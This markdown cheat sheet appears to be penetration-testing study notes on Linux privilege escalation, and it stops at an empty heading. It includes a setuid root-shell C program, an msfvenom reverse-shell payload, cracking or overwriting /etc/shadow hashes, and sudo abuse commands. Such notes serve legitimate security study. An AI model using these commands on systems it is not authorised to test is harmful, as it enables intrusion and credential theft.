# Linux Privilege Escalation

> Step by Step Linux Privilege Escalation Methodology

For Manual Refer this : [G0tmilk's Guide](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

## Spawning Root Shells

**rootbash SUID**

* Copy the /bin/bash executable file(rename as rootbash)

* Ensure that it is owned by the root user, and the SUID bit is set.

* Execute the rootbash file you created with -p flag in the command line

**Custom Executables**

C code:

```
int main() {
	setuid(0);
	system("/bin/bash -p");
}
```

To compile

```
gcc -o <name> <filename>.c
```

**msfvenom**

Executable file (elf) can be created using msfvenom

```
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$lhost LPORT=4444 -f elf > shell.elf
```

**Native Reverse Shells**

[Reverse Shell Generator - rsg](https://github.com/mthbernardes/rsg)

## Privilege Escalation Tools

- [Linux Smart Enumeration (lse.sh)](https://github.com/diego-treitos/linux-smart-enumeration)

- [LinEnum](https://github.com/rebootuser/LinEnum)

- [Linuxprivchecker](https://github.com/linted/linuxprivchecker)

## Privilege Escalation Techniques

### Kernel Exploits

- Enumerate Kernel Version : `uname -a`

- Use Google, Exploitdb, Github, searchsploit, linux-exploit-suggester etc.

### Service Exploits

**Enumerate root processes**

Try to find the version of the services that are running to search for vulnerabilities

```
ps aux | grep "^root"
```

**Enumerate Service Versions**

```
<program> --version
<program> -v
dpkg -l | grep <program>
rpm -qa | grep <program>
```

**Port Forwarding**

Determine the port : `netstat -nl`

Remote Forwarding using SSH

```
ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine-ip>
```

### Weak File Permissions

**/etc/shadow**

`ls -l /etc/shadow`

If it's readable copy the hash and put it into a file in your kali machine

Crack the hash:

`john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`

If it's writable, change the hash of the root user

`mkpasswd -m sha-512 newpassword`

**/etc/passwd**

If it's writable, write the hash for that user in this file

**Backups**

It is always worth exploring the file system looking for readable backup files. Some common places included:
`user home directories, the / root directory, /tmp, /var/backups`

### Sudo

Run a program using sudo: `sudo <program>`

Run a program as a specific user: `sudo -u <username> <program>`

If you encounter something like this 

```
User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```
Do this:

```
sudo -u scriptmanager /bin/bash
```

List programs a user is allowed (and not allowed) to run: `sudo -l`

If for some reason the su program is not allowed, there are other ways to escalate privileges
```
sudo -s
sudo -i
sudo /bin/bash
sudo passwd
```

**Shell Escape Sequences**

A list of programs with their shell escape sequences can be found [here](https://gtfobins.github.io/).

**Abusing Intended Functionality**

`sudo apache2 -f /etc/shadow`

**Environment Variables**

